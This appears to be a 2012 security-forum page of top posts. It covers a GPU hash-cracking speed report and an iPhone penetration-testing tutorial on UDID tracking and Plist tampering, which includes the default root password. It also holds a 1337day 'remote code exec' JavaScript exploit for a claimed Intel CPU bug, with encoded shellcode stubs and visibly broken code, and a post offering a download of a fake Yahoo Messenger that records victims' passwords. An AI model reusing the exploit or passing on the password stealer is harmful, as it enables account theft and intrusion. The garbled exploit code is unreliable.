
Leaderboard

Popular Content

Showing content with the highest reputation on 07/15/12 in all areas

  1. It's a good day when you see the following on 10 hashes: Yes, that's 154B - as in Billion. It was done entirely with AMD hardware, and involved 9x6990, 4x6970, 4x5870, 2x5970, and 1x7990 - for a total of 31 GPU cores in 6 physical systems. We had another 11 cards with 15 GPU cores left over - we didn't have systems to put them in (mostly nVidia). For more details, read on...

This morning, @jmgosney and I met up to work on the networking code for the new Multiforcer framework, and do some serious stress testing. I've been working on the networking code recently, and it needed some serious testing. I can do some testing in my development environment, but it usually takes going big to expose some types of bugs (which I most certainly did find). This is a good way to start a day:

After putting all the GPUs we had into the systems we had (one board & one power supply were acting up and were unable to be used), this was the stack left over:

The original plan was to use all the AMD cards, and fill in space with nVidia, but we unfortunately did not have enough room for all the AMD cards. Amusingly, one of my boards wouldn't find the hard drive controllers with 4 dual GPU cards installed. We also had a few remote systems that were helping out. There were supposed to be a few more, but they didn't pan out, so we were roughly 8 GPUs/12 cores short of where we were hoping to be. The server was an EC2 m1.small node, since I wanted to test the server at internet-scale latencies, and on a relatively low resource platform. We did not use any EC2 GPU nodes for this test, but may in the future...

After a good bit of troubleshooting, code updates, and pushing binaries around, we finally hit success, as observed above. Also, as noted below. Please remember, these are NOT single hash speeds - these are on a list of 1000 hashes, over the internet... There are still a few improvements left to make, including some (surprise) threading issues & mutex issues. But other than a few edge cases, things worked amazingly well! Also, there's no reason at all that nVidia cards couldn't have been helping. Even though they're slower, an nVidia GPU is still better than a CPU! If you want to play with this, it's currently in SVN. I'll be polishing off a few more bugs with the network code and then doing a release before Defcon. If you have more questions, you can also find me in my talk at Defcon - I will be presenting!

Impressive or what? Source
    1 point
  2. In the first part of this thread, we discussed the iPhone application traffic analysis. In this part, we will take a look at the privacy issues and the application local data storage.

Privacy issues

Every iPhone has an associated unique device identifier, derived from a set of hardware attributes, called the UDID. The UDID is burned into the device and one cannot remove or change it. However, it can be spoofed with the help of tools like UDID Faker. The UDID of the latest iPhone is computed with the formula given below:

UDID = SHA1(Serial Number + ECID + LOWERCASE(WiFi Address) + LOWERCASE(Bluetooth Address))

The UDID is exposed to application developers through an API which allows them to access the UDID of an iPhone without requiring the device owner's permission. The code snippet shown below is used to collect the UDID of a device, which can later be used to track the user's behavior.

NSString *uniqueIdentifier = [device uniqueIdentifier];

Current research shows that, with the help of the UDID, it is possible to observe the user's browsing patterns and trace the user's geo location. As it is possible to locate the user's exact location with the help of a device UDID, it has become a big privacy concern. More possible attacks are documented in Eric Smith's whitepaper on iPhone application privacy issues. Eric's research shows that 68% of applications silently send UDIDs to servers on the internet. A perfect example of a serious privacy breach is the social gaming network OpenFeint. OpenFeint collected device UDIDs and misused them by linking them to real-world user identities (like email address, geo location latitude & longitude, Facebook profile picture) and making them available for public access, resulting in a serious privacy breach. More details about this security breach are documented at this link.

While penetration testing, observe the network traffic for UDID transmission. A UDID in the network traffic indicates that the application is collecting the device identifier or might be sending it to a third party analytics company to track the user's behaviour. In iOS 5, Apple has deprecated the API that gives access to the UDID, and it will probably remove the API completely in future iOS releases. Development best practice is not to use the API that collects the device UDID, as it breaches the privacy of the user. If developers want to keep track of the user's behaviour, they should create a unique identifier specific to the application instead of using the UDID. The disadvantage of the application-specific identifier is that it only identifies an installation instance of the application, not the device.

Apart from the UDID, applications may transmit personally identifiable information like age, name, address and location details to third party analytics companies. Transmitting personally identifiable information to third party companies without the user's knowledge also violates the user's privacy. So, during penetration testing, carefully observe the network traffic for the transmission of any important data. Example: the Pandora application used to transmit the user's age and zip code to a third party analytics company (doubleclick.net) in clear text. For applications which require the user's geo location (ex: check-in services) to serve content, it is always recommended to use the least degree of accuracy necessary. This can be achieved with the help of the accuracy constants defined in the Core Location framework (ex: CLLocationAccuracy kCLLocationAccuracyNearestTenMeters).

Local data storage

Mobile applications store data locally on the device to maintain essential information across application executions, or for better performance or offline access. Also, developers use the local device storage to store information such as user preferences and application configuration. As device theft is becoming an increasing concern, especially in the enterprise, insecure local storage is considered to be the top risk among mobile application threats. A recent survey conducted by viaForensics revealed that 76 percent of mobile applications are storing the user's information on the device; 10 percent of them are even storing plain text passwords on the phone. Sensitive information stored on the iPhone can be obtained by attackers in several ways. A few of the ways are listed below.

From backups: When an iPhone is connected to iTunes, iTunes automatically takes a backup of everything on the device. Upon backup, sensitive files will also end up on the workstation. So an attacker who gets access to the workstation can read the sensitive information from the stored backup files.

Physical access to the device: People lose their phones and phones get stolen very easily. In both cases, an attacker gets physical access to the device and can read the sensitive information stored on the phone. The passcode set on the device will not protect the information, as it is possible to brute force the iPhone simple passcode within 20 minutes. To know more details about iPhone passcode bypass, go through the iPhone Forensics article available at InfoSec Resources – iPhone Forensics.

Malware: Leveraging a security weakness in iOS may allow an attacker to design malware which can steal the files on the iPhone remotely. Practical attacks are demonstrated by Eric Monti in his presentation "iPhone Rootkit? There's an App for That!".

iPhone application directory structure:

In iOS, applications are treated as a bundle represented within a directory. The bundle groups all the application resources, binaries and other related files into a directory. On the iPhone, applications are executed within a jailed environment (sandbox or seatbelt) with mobile user privileges. Unlike Android's UID-based segregation, iOS applications run as one user. Apple says: "The sandbox is a set of fine-grained controls limiting an application's access to files, preferences, network resources, hardware, and so on. Each application has access to the contents of its own sandbox but cannot access other applications' sandboxes. When an application is first installed on a device, the system creates the application's home directory, sets up some key subdirectories, and sets up the security privileges for the sandbox."

A sandbox is a restricted environment that prevents applications from accessing unauthorized resources; however, upon iPhone jailbreak, sandbox protection gets disabled. When an application is installed on the iPhone, it creates a directory with a unique identifier under the /var/mobile/Applications directory. Everything that is required for an application to execute will be contained in the created home directory. The typical iPhone application home directory structure is listed below.

On the iPhone, applications might store information in any of the locations listed below:

Plist files
Keychain
Application's home directory
Cache
Logs

Plist files:

A Property List is a structured, binary-formatted file which contains the essential configuration of a bundle executable in nested key-value pairs. Plist files are used to store the user preferences and the configuration information of an application. For example, gaming applications usually store game levels and game scores in Plist files. In general, applications store Plist files under the [Application's Home Directory]/documents/preferences folder. A Plist can be either in XML format or in binary format. As XML files are not the most efficient means of storage, most applications use binary-formatted Plist files. Binary-formatted data stored in Plist files can be easily viewed or modified using Plist editors (ex: plutil). Plist editors convert the binary-formatted data into XML-formatted data, which can then be edited easily.

Plist files are primarily designed to store user preferences & application configuration; however, applications may use Plist files to store clear text usernames, passwords and session-related information. So, while penetration testing, view all the Plist files available under the application's home directory and look for sensitive information like usernames, passwords, the user's personal information, session cookies, etc. Developers can assign any extension to Plist files. A Plist file can be easily identified by looking at the file contents using the cat command: the content of a binary Plist file starts with 'bplist'. Along with sensitive information storage, an application may also take authentication & authorization decisions based on the values stored in Plist files. For example, if you notice a Plist entry like admin=0 during penetration testing, change the admin key value to 1 and open the application. If the application does not validate the user input properly and takes the authorization decision based on the Plist entry, you may log into the application as an administrator. Development best practice is to not store any sensitive information in Plist files. Also, do not take authentication & authorization decisions based on the information stored in Plist files. Plist files contain user-controlled input, and it should be validated properly like any other user input.

The WordPress iPhone application used to store the clear text username and password in a Plist file. The video below demonstrates the WordPress vulnerability. This vulnerability was reported by SANS and WordPress fixed it immediately. Plist files can be viewed and modified easily on both jailbroken and non-jailbroken iPhones. The examples listed below illustrate the various ways of editing Plist files on both jailbroken and non-jailbroken devices.

Tampering with Plist files on a non-jailbroken iPhone:

On a non-jailbroken iPhone, Plist files can be viewed & modified using tools like iExplorer and iBackupBot.

Modifying Plist entries with iExplorer

iExplorer (formerly iPhone Explorer) gives access to the iPhone in disk mode and allows browsing all the folders on the iPhone directly. The Stick Cricket iPhone game is used for the demo. Stick Cricket stores the game score in a Plist file under the application's home directory. As the application is storing the game score locally in a Plist file, it can be altered by editing the Plist file. The screenshot shown below displays the actual score before the Plist modification. The steps shown below demonstrate the usage of the iExplorer tool to modify the game score stored in the Plist file:

1. On your workstation, download and install iExplorer.
2. Connect the iPhone to the workstation over USB.
3. In iExplorer, browse to the Apps->com.sticksports.stickcricket folder.
4. Navigate to the Stick Cricket Library->Preferences folder.
5. Copy the com.sticksports.stickcricket.plist file to the workstation by dragging it to the desktop.
6. On the workstation, open the Plist file using a Plist editor and modify the yourBest5Overs key value. For this demo, I have modified the value from 30 to 180 and saved the Plist file.
7. From iExplorer, delete com.sticksports.stickcricket.plist on the iPhone and drag the newly saved file onto the iPhone.
8. On the iPhone, terminate the Stick Cricket application and reopen it. The Stick Cricket welcome screen now displays the modified score as shown in the screenshot below.

Modifying Plist entries with iBackupBot

When the iPhone is connected to a computer, iTunes takes a backup of everything on the phone including configuration files (Plist files). The iBackupBot tool can be used to view and modify the Plist file entries in the iPhone backup and restore the modified backup onto the iPhone. The steps shown below demonstrate the use of the iBackupBot tool to modify the game score stored in the Plist file:

1. Connect the iPhone to the workstation over a USB cable.
2. On the workstation, open iTunes and take a backup of the iPhone. Close iTunes.
3. Open iBackupBot. It automatically identifies the existing backups and displays the files inside the backup to the user.
4. Click on Stick Cricket and open the /Library/Preferences/com.sticksports.stickcricket.plist file.
5. Modify the score stored in the Plist file.
6. Click on the Export icon to save the modified Plist file.
7. Click the Restore icon in the iBackupBot toolbar. It will restore the iPhone with the modified backup.
8. Now on the iPhone, reopening the Stick Cricket game will display the modified score.

Tampering with Plist files on a jailbroken iPhone:

On a jailbroken iPhone, Plist files can be viewed & modified using tools like plutil and iFile. Both these tools can be downloaded from Cydia (packages: com.eric.tool & iFile). iFile allows modifying the Plist files directly on the iPhone. The iPhone camera application is used for the demo. In the iOS camera application, Apple has hidden the panorama mode feature and planned to include this feature in future iOS versions. Panorama mode basically allows users to take continuous photos while panning the camera from left to right. Apple stored the panorama mode switch in a Plist file. iOS hackers Conrad & Chpwn exposed the panorama mode in iOS 5 by modifying an entry in the com.apple.mobileslideshow.plist file. The screenshot shown below displays the list of options available in the iPhone camera application. The steps shown below demonstrate the usage of the plutil tool to change the panorama switch stored in the Plist file:

1. SSH to the iPhone and log in as the root user (password: alpine).
2. Navigate to the /private/var/mobile/Library/Preferences/ directory.
3. View the com.apple.mobileslideshow.plist file content with the help of the plutil tool:

> plutil com.apple.mobileslideshow.plist

4. Add the 'EnableFirebreak' key to the com.apple.mobileslideshow.plist file with the below command:

> plutil -key EnableFirebreak -value yes com.apple.mobileslideshow.plist

It turns on the panorama feature in the iPhone camera application. The screenshot below shows the different options available in the iPhone camera after the modification.

Penetration Testing for iPhone Applications is going to be covered in a series of articles. Part 3 will cover the keychain data storage and error log analysis.

References: InfoSec Resources
    1 point
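An added example for the Plist review step in the post above (this is not code from the original post or from InfoSec Resources): it walks a copied application home directory, identifies Plist files by their leading bytes rather than by extension, parses both binary and XML Plists with Python's plistlib, and flags entries whose key names suggest stored credentials or authorization flags such as the admin=0 pattern. The directory layout and the two Plist files are constructed for the demo; the hint list and the .dat extension are assumptions.

```python
"""Scan an iOS app home directory for Plist files and flag sensitive-looking
entries. The sample directory built by build_demo_home() is constructed for
this demo, not taken from a real device."""
import os
import plistlib
import tempfile
from typing import Any, Iterator

# A binary Plist begins with "bplist"; an XML Plist begins with an XML
# declaration or the <plist> element.
BPLIST_MAGIC = b"bplist"
XML_PREFIXES = (b"<?xml", b"<plist")

# Key-name fragments a reviewer looks for (assumed list, matched
# case-insensitively against the last component of the key path).
SENSITIVE_KEY_HINTS = ("pass", "user", "login", "token", "session", "cookie",
                       "secret", "key", "admin", "auth", "email")


def looks_like_plist(path: str) -> bool:
    """Identify a Plist by content, since developers may use any extension."""
    with open(path, "rb") as fh:
        head = fh.read(64).lstrip()
    return head.startswith(BPLIST_MAGIC) or head.startswith(XML_PREFIXES)


def walk_values(node: Any, prefix: str = "") -> Iterator[tuple[str, Any]]:
    """Flatten nested dict/list structures into (dotted key path, value)."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from walk_values(value, f"{prefix}.{key}" if prefix else str(key))
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from walk_values(value, f"{prefix}[{index}]")
    else:
        yield prefix, node


def scan_plist(path: str) -> list[tuple[str, str, Any]]:
    """Return (file, key path, value) for entries with sensitive-looking keys."""
    with open(path, "rb") as fh:
        data = plistlib.load(fh)  # auto-detects binary vs XML format
    hits = []
    for keypath, value in walk_values(data):
        last = keypath.rsplit(".", 1)[-1].lower()
        if any(hint in last for hint in SENSITIVE_KEY_HINTS):
            hits.append((path, keypath, value))
    return hits


def scan_app_home(home_dir: str) -> list[tuple[str, str, Any]]:
    """Walk the app home directory and collect flagged entries from every Plist."""
    findings = []
    for root, _dirs, files in os.walk(home_dir):
        for name in files:
            path = os.path.join(root, name)
            try:
                if looks_like_plist(path):
                    findings.extend(scan_plist(path))
            except (OSError, plistlib.InvalidFileException, ValueError):
                continue  # unreadable or malformed file: skip it
    return findings


def build_demo_home() -> str:
    """Create a constructed app home directory with two Plists for the demo."""
    home = tempfile.mkdtemp(prefix="apphome_")
    prefs = os.path.join(home, "Library", "Preferences")
    os.makedirs(prefs)
    # Binary Plist holding a credential and an authorization flag, stored
    # under a misleading .dat extension (constructed sample values).
    with open(os.path.join(prefs, "settings.dat"), "wb") as fh:
        plistlib.dump({"username": "alice", "password": "hunter2",
                       "admin": 0, "theme": "dark"}, fh, fmt=plistlib.FMT_BINARY)
    # XML Plist holding only harmless preferences.
    with open(os.path.join(prefs, "com.example.game.plist"), "wb") as fh:
        plistlib.dump({"yourBest5Overs": 30, "sound": True}, fh,
                      fmt=plistlib.FMT_XML)
    return home


if __name__ == "__main__":
    for path, keypath, value in scan_app_home(build_demo_home()):
        print(f"{os.path.basename(path)}: {keypath} = {value!r}")
```

Running it against the constructed directory reports only the three entries from settings.dat (username, password, admin); the XML game Plist is parsed but produces no findings.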
  3. <!--
[+] Site : 1337day.com
[+] Support e-mail : submit[at]1337day.com
I'm S4(uR4 member from r00tw0rm team

# Name : Intel Core2Duo cpu cache controller bug PoC
# Date : july, 14 2012
# Author : S4(uR4
# Platform : all
# Type : remote exploit
# Web : www.r00tw0rm.com
# Email : satsura@r00tw0rm.com
# Credit and special thanx : Selena, nezumi
# Tested on : Intel Core 2 Duo T5750, Intel Atom N270
# Special thanks to : r0073r, r4dc0re, Sid3^effects, L0rd CrusAd3r, KedAns-Dz, Angel Injection, gunslinger, JF, CrosS (1337day.com)
# Xenu, Versus71, alsa7r, mich4th3c0wb0y, FInnH@X, th3breacher, s3rver.exe (r00tw0rm.com)
-->
<html>
<head>
<title>CPU cache controller bug exploit (Remote code exec mod poc)</title>
</head>
</html>
<body>
<script type="text/javascript">
var microcode = 257;
var N_CORE = 4;
var XXL = 9*1024*1024;
var buf = 9437185;
var p = {};
var bug;
var result;
var n = {};
function init_c(){};
function engine(p, n){};
function test(result){
// debug: testing micro-program for the old vm, does not work now
// latter comment 1: oh. my! it works! wow!
// latter comment 2: it works, but it does not what it's expected to
// dw buf[]={1,-3,0, -6,9,1, 13,-67,2, -69,96,3, 1,-1,4,
// -3,3,5, 16,-27,6, -66,99,7, 55,-1,8, -1,-3,9, 0,-67,10};
// the infinite loop will be patched on the fly because of the Intel CPU bug
// addr of the test() func should be aligned by 4Kb boundary,
// 1st dword will be changed to NOP, NOP, NOP, NOP
// it's possible to change the kernel memory as well,
// two things:
// 1) alignment;
// 2) the code is currently executed;
//
// engine() obtains the address of test(), but does not check it,
// so if you replace it, you have to check the conditionals above by yourself.
// also the content to overwrite. if you want to change data memory
// it's supposed to be in the cache as well.
/* ASM:
.text
.globl main
.type main, @function
L1:
    xorl %ecx, %ecx
main:
    pushl %ebp
    movl %esp, %ebp
    popl %ebp
    loop L1
    ret
.size main, .-main

DISASM:
080483b4 <L1>:
 80483b4: 31 c9    xor %ecx,%ecx
080483b6 <main>:
 80483b6: 55       push %ebp
 80483b7: 89 e5    mov %esp,%ebp
 80483b9: 5d       pop %ebp
 80483ba: e2 f8    loop 80483b4 <L1>
 80483bc: c3       ret
 80483bd: 90       nop
 80483be: 90       nop
 80483bf: 90       nop
*/
unescape('%u31C9%u5589%uE55D%u2EF8%uC390%u9090');
return 0;
}
function ThreadProc(lpParameter){
engine(buf, microcode*3);
return(0);
}
function ThreadProc_dbg(bug){
var result = 1;
test(result);
if (result != 1){
document.write("<h1>[+] your CPU is buggy!<h1>");
}
else{
document.write("<h1>[-] your CPU isn't buggy!<h1>");
//eueeuereturn(0);
}
}
function microcode_vm(){
var evilcode = "" + // long %u-encoded "micro-program" string not reproduced in this copy
"";
unescape(evilcode);
}
/*
// THREATED IMPLEMENTATION
function init(){
document.write("<p>[!] Exploit Running</p><br>");
document.write("[+] Loading micro-program");
microcode_vm();
var a, id, handle;
var size = 111;
document.write("initializing XX thread...");
for (a=1; a < N_CORE; a++){
//code should be written for debug.
}
}
*/
function vm_engine() {
var a, dw, f1, f2, f3, fn, f0 = -1, dt = 0;
for({
microcode_vm();
f1;
unescape = (p + ((dt++) % n));
f2 = (p + ((dt++) % n));
f3 = (p + ((dt++) % n));
// vm + scrambler + dynamic encoder + multi-pass obfuscator
fn = -1 ^ (f1 ^ f2) + ((dt + f1) ^ f2) ^ f0;
// a few minutes to trigger this condition on 2.4 MHz PC
if ( ((f1 ^ f2) == 0) || (f1 ^ f2 ^ f3) == 0) {
// a sync problem. it would be better to use locks over here.
// crash happens. crash is not shit. crash means code works.
// so, should be really care about the addr and the content?
// it works for Intel Core 2 Duo T5750. o_o 5 ~ 10 minutes of
// it gives BSOD on Intel Atom N270 cpu o_o less than an hour
f3 = test(result);
f1 = unescape("%u9090%u9090") ^ f0 + // Shellcode Calculator
unescape(""); // long %u-encoded shellcode string not reproduced in this copy
f2 = test ^ fn;
document.write("<br><br>w00t! w00t! u g0t r00t ?!<br>");
}
(p + (f3 % n)) = fn;
f0 = fn; /* f0 = fn ^ dt */ ;
}
}
function demo() {
var n;
document.write("HITB 2008 missing exploit :=) by Selena<br><br>");
document.write("micro-code is written by Selena<br>");
document.write("virtual machine is designed by Selena<br>");
document.write("virtual machine is designed by Selena<br>");
document.write("virtual machine has been rewritten by nezumi<br><br>");
document.write("exploit PoC rewritten by S4(uR4 for remote atack demo 2012<br><br>");
//setTimeout(9000);
document.write("[!]<b> Exploit Running");
vm_engine();
//if (n == 0) { init_t();} ;
//if(result != 0){
document.write("<br><b>[+] Done!");
//}
}
</script>
<h1>CPU cache controller bug exploit Remote code exec mod</h1>
<button onClick="ThreadProc_dbg(bug)";><b>• Check vuln</b> »</button>
<button onClick="demo()";><b>PoC Run!</b> ?</button>
</body>
# 1337day.com [2012-07-13]
    1 point
  4. Decrypted in 2 minutes and it works perfectly :-> Thanks
    -1 points
  5. I present to you a fake Y! Messenger that saves the passwords! The passwords are saved in c:/luke999/ + something random.txt. It is made in VB6! A screenshot of the 2 Messengers: http://desmond.imageshack.us/Himg822/scaled.php?server=822&filename=ymfake.jpg&res=landing download link: GirlShare - Download Fake Yahoo! Messenger by luke999.rar PS: tested on XP SP3! VT: https://www.virustotal.com/file/a3664051bd3e504291742b05f12cbdc15c30f3a523234181e499cf9e57408aac/analysis/
    -1 points